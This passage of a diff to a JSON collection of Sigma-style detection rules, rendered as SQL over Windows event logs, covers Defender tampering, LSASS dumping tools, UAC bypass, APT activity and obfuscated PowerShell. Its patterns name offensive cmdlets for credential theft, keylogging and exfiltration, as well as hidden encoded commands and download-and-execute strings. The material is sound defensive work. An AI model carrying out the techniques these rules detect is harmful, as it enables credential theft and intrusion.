'%DisableScanningNetworkFiles $true%' ESCAPE '\\')) OR ((HostApplication LIKE '%Set-MpPreference%' ESCAPE '\\' AND HostApplication LIKE '%Allow%' ESCAPE '\\' AND (HostApplication LIKE '%LowThreatDefaultAction%' ESCAPE '\\' OR HostApplication LIKE '%ModerateThreatDefaultAction%' ESCAPE '\\' OR HostApplication LIKE '%HighThreatDefaultAction%' ESCAPE '\\')) OR (HostApplication LIKE '%ltdefac %' ESCAPE '\\' OR HostApplication LIKE '%mtdefac %' ESCAPE '\\' OR HostApplication LIKE '%htdefac %' ESCAPE '\\' OR HostApplication LIKE '%stdefac %' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\loader.exe' ESCAPE '\\' AND CommandLine LIKE '%--pid:%' ESCAPE '\\') OR (Imphash IN ('38d9e015591bbfd4929e0d0f47fa0055', '0e2216679ca6e1094d63322e3412d650') OR Hashes IN ('IMPHASH=38D9E015591BBFD4929E0D0F47FA0055', 'IMPHASH=0E2216679CA6E1094D63322E3412D650')) OR (CommandLine LIKE '%--pid:%' ESCAPE '\\' AND CommandLine LIKE '%--outfile:%' ESCAPE '\\' AND (CommandLine LIKE '%.dmp%' ESCAPE '\\' OR CommandLine LIKE '%lsass%' ESCAPE '\\' OR CommandLine LIKE '%.obf%' ESCAPE '\\' OR CommandLine LIKE '%dump%' ESCAPE '\\'))))" ], - "filename": "posh_pc_tamper_with_windows_defender.yml" + "filename": "proc_creation_win_hktl_handlekatz.yml" }, { - "title": "Suspicious PowerShell Invocations - Generic - PowerShell Module", - "id": "bbb80e91-5746-4fbe-8898-122e2cafdbf4", - "status": "experimental", - "description": "Detects suspicious PowerShell invocation command parameters", - "author": "Florian Roth (Nextron Systems)", + "title": "Tasks Folder Evasion", + "id": "cc4e02ba-9c06-48e2-b09e-2500cace9ae0", + "status": "test", + "description": "The Tasks folder in system32 and syswow64 are globally writable paths.\nAdversaries can take advantage of this and load or influence any script hosts or ANY .NET Application \nin Tasks to load and execute a custom assembly into cscript, wscript, regsvr32, mshta, eventvwr\n", + "author": 
"Sreeman", "tags": [ + "attack.defense_evasion", + "attack.persistence", "attack.execution", - "attack.t1059.001" + "attack.t1574.002" ], "falsepositives": [ - "Very special / sneaky PowerShell scripts" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ContextInfo LIKE '% -enc %' ESCAPE '\\' OR ContextInfo LIKE '% -EncodedCommand %' ESCAPE '\\' OR ContextInfo LIKE '% -ec %' ESCAPE '\\') AND (ContextInfo LIKE '% -w hidden %' ESCAPE '\\' OR ContextInfo LIKE '% -window hidden %' ESCAPE '\\' OR ContextInfo LIKE '% -windowstyle hidden %' ESCAPE '\\' OR ContextInfo LIKE '% -w 1 %' ESCAPE '\\') AND (ContextInfo LIKE '% -noni %' ESCAPE '\\' OR ContextInfo LIKE '% -noninteractive %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%echo %' ESCAPE '\\' OR CommandLine LIKE '%copy %' ESCAPE '\\' OR CommandLine LIKE '%type %' ESCAPE '\\' OR CommandLine LIKE '%file createnew%' ESCAPE '\\') AND (CommandLine LIKE '% C:\\\\Windows\\\\System32\\\\Tasks\\\\%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\Windows\\\\SysWow64\\\\Tasks\\\\%' ESCAPE '\\'))" ], - "filename": "posh_pm_susp_invocation_generic.yml" + "filename": "proc_creation_win_susp_task_folder_evasion.yml" }, { - "title": "Invoke-Obfuscation Via Use MSHTA - PowerShell Module", - "id": "07ad2ea8-6a55-4ac6-bf3e-91b8e59676eb", - "status": "experimental", - "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", - "author": "Nikita Nazarov, oscd.community", + "title": "Potential PowerShell Execution Via DLL", + "id": "6812a10b-60ea-420c-832f-dfcc33b646ba", + "status": "test", + "description": "Detects potential PowerShell execution from a DLL instead of the usual PowerShell process as seen used in PowerShdll", + "author": "Markus Neis, Nasreddine Bencherchali", "tags": [ "attack.defense_evasion", - "attack.t1027", - 
"attack.execution", - "attack.t1059.001" + "attack.t1218.011" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload LIKE '%set%' ESCAPE '\\' AND Payload LIKE '%&&%' ESCAPE '\\' AND Payload LIKE '%mshta%' ESCAPE '\\' AND Payload LIKE '%vbscript:createobject%' ESCAPE '\\' AND Payload LIKE '%.run%' ESCAPE '\\' AND Payload LIKE '%(window.close)%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvcs.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\InstallUtil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regasm.exe' ESCAPE '\\') OR OriginalFileName IN ('RUNDLL32.EXE', 'RegSvcs.exe', 'InstallUtil.exe', 'RegAsm.exe')) AND (CommandLine LIKE '%Default.GetString%' ESCAPE '\\' OR CommandLine LIKE '%FromBase64String%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Expression%' ESCAPE '\\' OR CommandLine LIKE '%IEX %' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Command%' ESCAPE '\\' OR CommandLine LIKE '%ICM %' ESCAPE '\\' OR CommandLine LIKE '%DownloadString%' ESCAPE '\\'))" ], - "filename": "posh_pm_invoke_obfuscation_via_use_mhsta.yml" + "filename": "proc_creation_win_powershell_dll_execution.yml" }, { - "title": "Malicious PowerShell Commandlets - PoshModule", - "id": "7d0d0329-0ef1-4e84-a9f5-49500f9d7c6c", + "title": "OilRig APT Activity", + "id": "ce6e34ca-966d-41c9-8d93-5b06c8b97a06", "status": "test", - "description": "Detects Commandlet names from well-known PowerShell exploitation frameworks", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects OilRig activity as reported by Nyotron in their March 2018 report", + "author": "Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", "tags": [ - "attack.execution", - 
"attack.discovery", - "attack.t1482", - "attack.t1087", - "attack.t1087.001", - "attack.t1087.002", - "attack.t1069.001", - "attack.t1069.002", - "attack.t1069", - "attack.t1059.001" + "attack.persistence", + "attack.g0049", + "attack.t1053.005", + "attack.s0111", + "attack.t1543.003", + "attack.defense_evasion", + "attack.t1112", + "attack.command_and_control", + "attack.t1071.004" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (Payload LIKE '%Add-Exfiltration%' ESCAPE '\\' OR Payload LIKE '%Add-Persistence%' ESCAPE '\\' OR Payload LIKE '%Add-RegBackdoor%' ESCAPE '\\' OR Payload LIKE '%Add-RemoteRegBackdoor%' ESCAPE '\\' OR Payload LIKE '%Add-ScrnSaveBackdoor%' ESCAPE '\\' OR Payload LIKE '%Check-VM%' ESCAPE '\\' OR Payload LIKE '%ConvertTo-Rc4ByteStream%' ESCAPE '\\' OR Payload LIKE '%Decrypt-Hash%' ESCAPE '\\' OR Payload LIKE '%Do-Exfiltration%' ESCAPE '\\' OR Payload LIKE '%Enabled-DuplicateToken%' ESCAPE '\\' OR Payload LIKE '%Exploit-Jboss%' ESCAPE '\\' OR Payload LIKE '%Find-Fruit%' ESCAPE '\\' OR Payload LIKE '%Find-GPOLocation%' ESCAPE '\\' OR Payload LIKE '%Find-TrustedDocuments%' ESCAPE '\\' OR Payload LIKE '%Get-ApplicationHost%' ESCAPE '\\' OR Payload LIKE '%Get-ChromeDump%' ESCAPE '\\' OR Payload LIKE '%Get-ClipboardContents%' ESCAPE '\\' OR Payload LIKE '%Get-FoxDump%' ESCAPE '\\' OR Payload LIKE '%Get-GPPPassword%' ESCAPE '\\' OR Payload LIKE '%Get-IndexedItem%' ESCAPE '\\' OR Payload LIKE '%Get-Keystrokes%' ESCAPE '\\' OR Payload LIKE '%Get-LSASecret%' ESCAPE '\\' OR Payload LIKE '%Get-PassHashes%' ESCAPE '\\' OR Payload LIKE '%Get-RegAlwaysInstallElevated%' ESCAPE '\\' OR Payload LIKE '%Get-RegAutoLogon%' ESCAPE '\\' OR Payload LIKE '%Get-RemoteBootKey%' ESCAPE '\\' OR Payload LIKE '%Get-RemoteCachedCredential%' ESCAPE '\\' OR Payload LIKE 
'%Get-RemoteLocalAccountHash%' ESCAPE '\\' OR Payload LIKE '%Get-RemoteLSAKey%' ESCAPE '\\' OR Payload LIKE '%Get-RemoteMachineAccountHash%' ESCAPE '\\' OR Payload LIKE '%Get-RemoteNLKMKey%' ESCAPE '\\' OR Payload LIKE '%Get-RickAstley%' ESCAPE '\\' OR Payload LIKE '%Get-Screenshot%' ESCAPE '\\' OR Payload LIKE '%Get-SecurityPackages%' ESCAPE '\\' OR Payload LIKE '%Get-ServiceFilePermission%' ESCAPE '\\' OR Payload LIKE '%Get-ServicePermission%' ESCAPE '\\' OR Payload LIKE '%Get-ServiceUnquoted%' ESCAPE '\\' OR Payload LIKE '%Get-SiteListPassword%' ESCAPE '\\' OR Payload LIKE '%Get-System%' ESCAPE '\\' OR Payload LIKE '%Get-TimedScreenshot%' ESCAPE '\\' OR Payload LIKE '%Get-UnattendedInstallFile%' ESCAPE '\\' OR Payload LIKE '%Get-Unconstrained%' ESCAPE '\\' OR Payload LIKE '%Get-USBKeystrokes%' ESCAPE '\\' OR Payload LIKE '%Get-VaultCredential%' ESCAPE '\\' OR Payload LIKE '%Get-VulnAutoRun%' ESCAPE '\\' OR Payload LIKE '%Get-VulnSchTask%' ESCAPE '\\' OR Payload LIKE '%Gupt-Backdoor%' ESCAPE '\\' OR Payload LIKE '%HTTP-Login%' ESCAPE '\\' OR Payload LIKE '%Install-ServiceBinary%' ESCAPE '\\' OR Payload LIKE '%Install-SSP%' ESCAPE '\\' OR Payload LIKE '%Invoke-ACLScanner%' ESCAPE '\\' OR Payload LIKE '%Invoke-ADSBackdoor%' ESCAPE '\\' OR Payload LIKE '%Invoke-AllChecks%' ESCAPE '\\' OR Payload LIKE '%Invoke-ARPScan%' ESCAPE '\\' OR Payload LIKE '%Invoke-AzureHound%' ESCAPE '\\' OR Payload LIKE '%Invoke-BackdoorLNK%' ESCAPE '\\' OR Payload LIKE '%Invoke-BadPotato%' ESCAPE '\\' OR Payload LIKE '%Invoke-BetterSafetyKatz%' ESCAPE '\\' OR Payload LIKE '%Invoke-BypassUAC%' ESCAPE '\\' OR Payload LIKE '%Invoke-Carbuncle%' ESCAPE '\\' OR Payload LIKE '%Invoke-Certify%' ESCAPE '\\' OR Payload LIKE '%Invoke-ConPtyShell%' ESCAPE '\\' OR Payload LIKE '%Invoke-CredentialInjection%' ESCAPE '\\' OR Payload LIKE '%Invoke-DAFT%' ESCAPE '\\' OR Payload LIKE '%Invoke-DCSync%' ESCAPE '\\' OR Payload LIKE '%Invoke-DinvokeKatz%' ESCAPE '\\' OR Payload LIKE '%Invoke-DllInjection%' 
ESCAPE '\\' OR Payload LIKE '%Invoke-DomainPasswordSpray%' ESCAPE '\\' OR Payload LIKE '%Invoke-DowngradeAccount%' ESCAPE '\\' OR Payload LIKE '%Invoke-EgressCheck%' ESCAPE '\\' OR Payload LIKE '%Invoke-Eyewitness%' ESCAPE '\\' OR Payload LIKE '%Invoke-FakeLogonScreen%' ESCAPE '\\' OR Payload LIKE '%Invoke-Farmer%' ESCAPE '\\' OR Payload LIKE '%Invoke-Get-RBCD-Threaded%' ESCAPE '\\' OR Payload LIKE '%Invoke-Gopher%' ESCAPE '\\' OR Payload LIKE '%Invoke-Grouper%' ESCAPE '\\' OR Payload LIKE '%Invoke-HandleKatz%' ESCAPE '\\' OR Payload LIKE '%Invoke-ImpersonatedProcess%' ESCAPE '\\' OR Payload LIKE '%Invoke-ImpersonateSystem%' ESCAPE '\\' OR Payload LIKE '%Invoke-InteractiveSystemPowerShell%' ESCAPE '\\' OR Payload LIKE '%Invoke-Internalmonologue%' ESCAPE '\\' OR Payload LIKE '%Invoke-Inveigh%' ESCAPE '\\' OR Payload LIKE '%Invoke-InveighRelay%' ESCAPE '\\' OR Payload LIKE '%Invoke-KrbRelay%' ESCAPE '\\' OR Payload LIKE '%Invoke-LdapSignCheck%' ESCAPE '\\' OR Payload LIKE '%Invoke-Lockless%' ESCAPE '\\' OR Payload LIKE '%Invoke-MalSCCM%' ESCAPE '\\' OR Payload LIKE '%Invoke-Mimikatz%' ESCAPE '\\' OR Payload LIKE '%Invoke-Mimikittenz%' ESCAPE '\\' OR Payload LIKE '%Invoke-MITM6%' ESCAPE '\\' OR Payload LIKE '%Invoke-NanoDump%' ESCAPE '\\' OR Payload LIKE '%Invoke-NetRipper%' ESCAPE '\\' OR Payload LIKE '%Invoke-Nightmare%' ESCAPE '\\' OR Payload LIKE '%Invoke-NinjaCopy%' ESCAPE '\\' OR Payload LIKE '%Invoke-OfficeScrape%' ESCAPE '\\' OR Payload LIKE '%Invoke-OxidResolver%' ESCAPE '\\' OR Payload LIKE '%Invoke-P0wnedshell%' ESCAPE '\\' OR Payload LIKE '%Invoke-Paranoia%' ESCAPE '\\' OR Payload LIKE '%Invoke-PortScan%' ESCAPE '\\' OR Payload LIKE '%Invoke-PoshRatHttp%' ESCAPE '\\' OR Payload LIKE '%Invoke-PostExfil%' ESCAPE '\\' OR Payload LIKE '%Invoke-PowerDump%' ESCAPE '\\' OR Payload LIKE '%Invoke-PowerShellTCP%' ESCAPE '\\' OR Payload LIKE '%Invoke-PowerShellWMI%' ESCAPE '\\' OR Payload LIKE '%Invoke-PPLDump%' ESCAPE '\\' OR Payload LIKE '%Invoke-PsExec%' ESCAPE 
'\\' OR Payload LIKE '%Invoke-PSInject%' ESCAPE '\\' OR Payload LIKE '%Invoke-PsUaCme%' ESCAPE '\\' OR Payload LIKE '%Invoke-ReflectivePEInjection%' ESCAPE '\\' OR Payload LIKE '%Invoke-ReverseDNSLookup%' ESCAPE '\\' OR Payload LIKE '%Invoke-Rubeus%' ESCAPE '\\' OR Payload LIKE '%Invoke-RunAs%' ESCAPE '\\' OR Payload LIKE '%Invoke-SafetyKatz%' ESCAPE '\\' OR Payload LIKE '%Invoke-SauronEye%' ESCAPE '\\' OR Payload LIKE '%Invoke-SCShell%' ESCAPE '\\' OR Payload LIKE '%Invoke-Seatbelt%' ESCAPE '\\' OR Payload LIKE '%Invoke-ServiceAbuse%' ESCAPE '\\' OR Payload LIKE '%Invoke-ShadowSpray%' ESCAPE '\\' OR Payload LIKE '%Invoke-Sharp%' ESCAPE '\\' OR Payload LIKE '%Invoke-Shellcode%' ESCAPE '\\' OR Payload LIKE '%Invoke-SMBScanner%' ESCAPE '\\' OR Payload LIKE '%Invoke-Snaffler%' ESCAPE '\\' OR Payload LIKE '%Invoke-Spoolsample%' ESCAPE '\\' OR Payload LIKE '%Invoke-SpraySinglePassword%' ESCAPE '\\' OR Payload LIKE '%Invoke-SSHCommand%' ESCAPE '\\' OR Payload LIKE '%Invoke-StandIn%' ESCAPE '\\' OR Payload LIKE '%Invoke-StickyNotesExtract%' ESCAPE '\\' OR Payload LIKE '%Invoke-SystemCommand%' ESCAPE '\\' OR Payload LIKE '%Invoke-Tasksbackdoor%' ESCAPE '\\' OR Payload LIKE '%Invoke-Tater%' ESCAPE '\\' OR Payload LIKE '%Invoke-Thunderfox%' ESCAPE '\\' OR Payload LIKE '%Invoke-ThunderStruck%' ESCAPE '\\' OR Payload LIKE '%Invoke-TokenManipulation%' ESCAPE '\\' OR Payload LIKE '%Invoke-Tokenvator%' ESCAPE '\\' OR Payload LIKE '%Invoke-TotalExec%' ESCAPE '\\' OR Payload LIKE '%Invoke-UrbanBishop%' ESCAPE '\\' OR Payload LIKE '%Invoke-UserHunter%' ESCAPE '\\' OR Payload LIKE '%Invoke-VoiceTroll%' ESCAPE '\\' OR Payload LIKE '%Invoke-Whisker%' ESCAPE '\\' OR Payload LIKE '%Invoke-WinEnum%' ESCAPE '\\' OR Payload LIKE '%Invoke-winPEAS%' ESCAPE '\\' OR Payload LIKE '%Invoke-WireTap%' ESCAPE '\\' OR Payload LIKE '%Invoke-WmiCommand%' ESCAPE '\\' OR Payload LIKE '%Invoke-WMIExec%' ESCAPE '\\' OR Payload LIKE '%Invoke-WScriptBypassUAC%' ESCAPE '\\' OR Payload LIKE 
'%Invoke-Zerologon%' ESCAPE '\\' OR Payload LIKE '%MailRaider%' ESCAPE '\\' OR Payload LIKE '%New-HoneyHash%' ESCAPE '\\' OR Payload LIKE '%New-InMemoryModule%' ESCAPE '\\' OR Payload LIKE '%Out-Minidump%' ESCAPE '\\' OR Payload LIKE '%Port-Scan%' ESCAPE '\\' OR Payload LIKE '%PowerBreach%' ESCAPE '\\' OR Payload LIKE '%powercat %' ESCAPE '\\' OR Payload LIKE '%PowerUp%' ESCAPE '\\' OR Payload LIKE '%PowerView%' ESCAPE '\\' OR Payload LIKE '%Remove-Update%' ESCAPE '\\' OR Payload LIKE '%Set-MacAttribute%' ESCAPE '\\' OR Payload LIKE '%Set-Wallpaper%' ESCAPE '\\' OR Payload LIKE '%Show-TargetScreen%' ESCAPE '\\' OR Payload LIKE '%Start-CaptureServer%' ESCAPE '\\' OR Payload LIKE '%Start-WebcamRecorder%' ESCAPE '\\' OR Payload LIKE '%VolumeShadowCopyTools%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%SC Scheduled Scan%' ESCAPE '\\' AND CommandLine LIKE '%\\\\microsoft\\\\Taskbar\\\\autoit3.exe%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\Windows\\\\Temp\\\\DB\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\Service.exe' ESCAPE '\\' AND (CommandLine LIKE '%i%' ESCAPE '\\' OR CommandLine LIKE '%u%' ESCAPE '\\')) OR (ParentProcessName LIKE '%\\\\local\\\\microsoft\\\\Taskbar\\\\autoit3.exe' ESCAPE '\\' AND CommandLine LIKE '%nslookup.exe%' ESCAPE '\\' AND CommandLine LIKE '%-q=TXT%' ESCAPE '\\')))" ], - "filename": "posh_pm_malicious_commandlets.yml" + "filename": "proc_creation_win_apt_oilrig_mar18.yml" }, { - "title": "Bad Opsec Powershell Code Artifacts", - "id": "8d31a8ce-46b5-4dd6-bdc3-680931f1db86", + "title": "Operation Wocao Activity", + "id": "1cfac73c-be78-4f9a-9b08-5bde0c3953ab", "status": "test", - "description": "focuses on trivial artifacts observed in variants of prevalent offensive ps1 payloads, including\nCobalt Strike Beacon, PoshC2, Powerview, Letmein, Empire, Powersploit, and other attack payloads \nthat often 
undergo minimal changes by attackers due to bad opsec.\n", - "author": "ok @securonix invrep_de, oscd.community", + "description": "Detects activity mentioned in Operation Wocao report", + "author": "Florian Roth (Nextron Systems), frack113", "tags": [ + "attack.discovery", + "attack.t1012", + "attack.defense_evasion", + "attack.t1036.004", + "attack.t1027", "attack.execution", + "attack.t1053.005", "attack.t1059.001" ], "falsepositives": [ - "Moderate-to-low; Despite the shorter length/lower entropy for some of these, because of high specificity, fp appears to be fairly limited in many environments." + "Administrators that use checkadmin.exe tool to enumerate local administrators" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (Payload LIKE '%$DoIt%' ESCAPE '\\' OR Payload LIKE '%harmj0y%' ESCAPE '\\' OR Payload LIKE '%mattifestation%' ESCAPE '\\' OR Payload LIKE '%\\_RastaMouse%' ESCAPE '\\' OR Payload LIKE '%tifkin\\_%' ESCAPE '\\' OR Payload LIKE '%0xdeadbeef%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%checkadmin.exe 127.0.0.1 -all%' ESCAPE '\\' OR CommandLine LIKE '%netsh advfirewall firewall add rule name=powershell dir=in%' ESCAPE '\\' OR CommandLine LIKE '%cmd /c powershell.exe -ep bypass -file c:\\\\s.ps1%' ESCAPE '\\' OR CommandLine LIKE '%/tn win32times /f%' ESCAPE '\\' OR CommandLine LIKE '%create win32times binPath=%' ESCAPE '\\' OR CommandLine LIKE '%\\\\c$\\\\windows\\\\system32\\\\devmgr.dll%' ESCAPE '\\' OR CommandLine LIKE '% -exec bypass -enc JgAg%' ESCAPE '\\' OR CommandLine LIKE '%type %keepass\\\\KeePass.config.xml%' ESCAPE '\\' OR CommandLine LIKE '%iie.exe iie.txt%' ESCAPE '\\' OR CommandLine LIKE '%reg query HKEY\\_CURRENT\\_USER\\\\Software\\\\%\\\\PuTTY\\\\Sessions\\\\%' ESCAPE '\\'))" ], - "filename": 
"posh_pm_bad_opsec_artifacts.yml" + "filename": "proc_creation_win_apt_wocao.yml" }, { - "title": "Remote PowerShell Session (PS Module)", - "id": "96b9f619-aa91-478f-bacb-c3e50f8df575", - "status": "test", - "description": "Detects remote PowerShell sessions", - "author": "Roberto Rodriguez @Cyb3rWard0g, Tim Shelton", + "title": "CMSTP UAC Bypass via COM Object Access", + "id": "4b60e6f2-bf39-47b4-b4ea-398e33cfe253", + "status": "stable", + "description": "Detects UAC Bypass Attempt Using Microsoft Connection Manager Profile Installer Autoelevate-capable COM Objects (e.g. UACMe ID of 41, 43, 58 or 65)", + "author": "Nik Seetharaman, Christian Burkard (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1059.001", - "attack.lateral_movement", - "attack.t1021.006" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002", + "attack.t1218.003", + "attack.g0069", + "car.2019-04-001" ], "falsepositives": [ - "Legitimate use remote PowerShell sessions" + "Legitimate CMSTP use (unlikely in modern enterprise environments)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ContextInfo LIKE '% = ServerRemoteHost %' ESCAPE '\\' AND ContextInfo LIKE '%wsmprovhost.exe%' ESCAPE '\\') AND NOT ((ContextInfo LIKE '%\\\\Windows\\\\system32\\\\WindowsPowerShell\\\\v1.0\\\\Modules\\\\Microsoft.PowerShell.Archive\\\\Microsoft.PowerShell.Archive.psm1%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\DllHost.exe' ESCAPE '\\' AND (ParentCommandLine LIKE '% /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}%' ESCAPE '\\' OR ParentCommandLine LIKE '% /Processid:{3E000D72-A845-4CD9-BD83-80C07C3B881F}%' ESCAPE '\\' OR ParentCommandLine LIKE '% /Processid:{BD54C901-076B-434E-B6C7-17C531F4AB41}%' ESCAPE '\\' OR ParentCommandLine LIKE '% 
/Processid:{D2E7041B-2927-42FB-8E9F-7CE93B6DC937}%' ESCAPE '\\' OR ParentCommandLine LIKE '% /Processid:{E9495B87-D950-4AB5-87A5-FF6D70BF3E90}%' ESCAPE '\\') AND IntegrityLevel IN ('High', 'System'))" ], - "filename": "posh_pm_remote_powershell_session.yml" + "filename": "proc_creation_win_uac_bypass_cmstp_com_object_access.yml" }, { - "title": "Invoke-Obfuscation CLIP+ Launcher - PowerShell Module", - "id": "a136cde0-61ad-4a61-9b82-8dc490e60dd2", + "title": "Suspicious Schtasks From Env Var Folder", + "id": "81325ce1-be01-4250-944f-b4789644556f", "status": "experimental", - "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", + "description": "Detects Schtask creations that point to a suspicious folder or an environment variable often used by malware", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027", "attack.execution", - "attack.t1059.001" + "attack.t1053.005" ], "falsepositives": [ - "Unknown" + "Benign scheduled tasks creations or executions that happen often during software installations", + "Software that uses the AppData folder and scheduled tasks to update the software in the AppData folders" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload REGEXP '.*cmd.{0,5}(?:/c|/r).+clip(?:\\.exe)?.{0,4}&&.+clipboard]::\\(\\s\\\\\"\\{\\d\\}.+-f.+\"')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '% /create %' ESCAPE '\\' AND (CommandLine LIKE '%\\%AppData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE 
'%C:\\\\Windows\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Perflogs%' ESCAPE '\\')) OR (ParentCommandLine LIKE '%\\\\svchost.exe -k netsvcs -p -s Schedule' ESCAPE '\\' AND (CommandLine LIKE '%\\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Perflogs%' ESCAPE '\\'))) AND NOT (((CommandLine LIKE '%update\\_task.xml%' ESCAPE '\\' OR CommandLine LIKE '%/Create /TN TVInstallRestore /TR%' ESCAPE '\\') OR ParentCommandLine LIKE '%unattended.ini%' ESCAPE '\\') OR (CommandLine LIKE '%/Create /Xml \"C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\.CR.%' ESCAPE '\\' AND CommandLine LIKE '%Avira\\_Security\\_Installation.xml%' ESCAPE '\\') OR (CommandLine LIKE '%/Create /F /TN%' ESCAPE '\\' AND CommandLine LIKE '%/Xml %' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\is-%' ESCAPE '\\' AND CommandLine LIKE '%Avira\\_%' ESCAPE '\\' AND (CommandLine LIKE '%.tmp\\\\UpdateFallbackTask.xml%' ESCAPE '\\' OR CommandLine LIKE '%.tmp\\\\WatchdogServiceControlManagerTimeout.xml%' ESCAPE '\\' OR CommandLine LIKE '%.tmp\\\\SystrayAutostart.xml%' ESCAPE '\\' OR CommandLine LIKE '%.tmp\\\\MaintenanceTask.xml%' ESCAPE '\\')) OR (CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '%/Create /TN \"klcp\\_update\" /XML %' ESCAPE '\\' AND CommandLine LIKE '%\\\\klcp\\_update\\_task.xml%' ESCAPE '\\')))" ], - "filename": "posh_pm_invoke_obfuscation_clip.yml" + "filename": "proc_creation_win_schtasks_env_folder.yml" }, { - "title": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - PowerShell Module", - "id": "f3c89218-8c3d-4ba9-9974-f1d8e6a1b4a6", + "title": "Finger.exe Suspicious Invocation", + "id": "af491bca-e752-4b44-9c86-df5680533dbc", "status": "experimental", - "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", - "author": "Timur Zinniatullin, oscd.community", + 
"description": "Detects suspicious aged finger.exe tool execution often used in malware attacks nowadays", + "author": "Florian Roth (Nextron Systems), omkar72, oscd.community", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ - "Unknown" + "Admin activity (unclear what they do nowadays with finger.exe)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload REGEXP '(?i).*&&set.*(\\{\\d\\}){2,}\\\\\"\\s+?-f.*&&.*cmd.*/c')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'finger.exe' OR NewProcessName LIKE '%\\\\finger.exe' ESCAPE '\\'))" ], - "filename": "posh_pm_invoke_obfuscation_via_var.yml" + "filename": "proc_creation_win_finger_usage.yml" }, { - "title": "Invoke-Obfuscation Via Stdin - PowerShell Module", - "id": "c72aca44-8d52-45ad-8f81-f96c4d3c755e", - "status": "experimental", - "description": "Detects Obfuscated Powershell via Stdin in Scripts", - "author": "Nikita Nazarov, oscd.community", + "title": "HackTool - Dumpert Process Dumper Execution", + "id": "2704ab9e-afe2-4854-a3b1-0c0706d03578", + "status": "test", + "description": "Detects the use of Dumpert process dumper, which dumps the lsass.exe process memory", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Unknown" + "Very unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 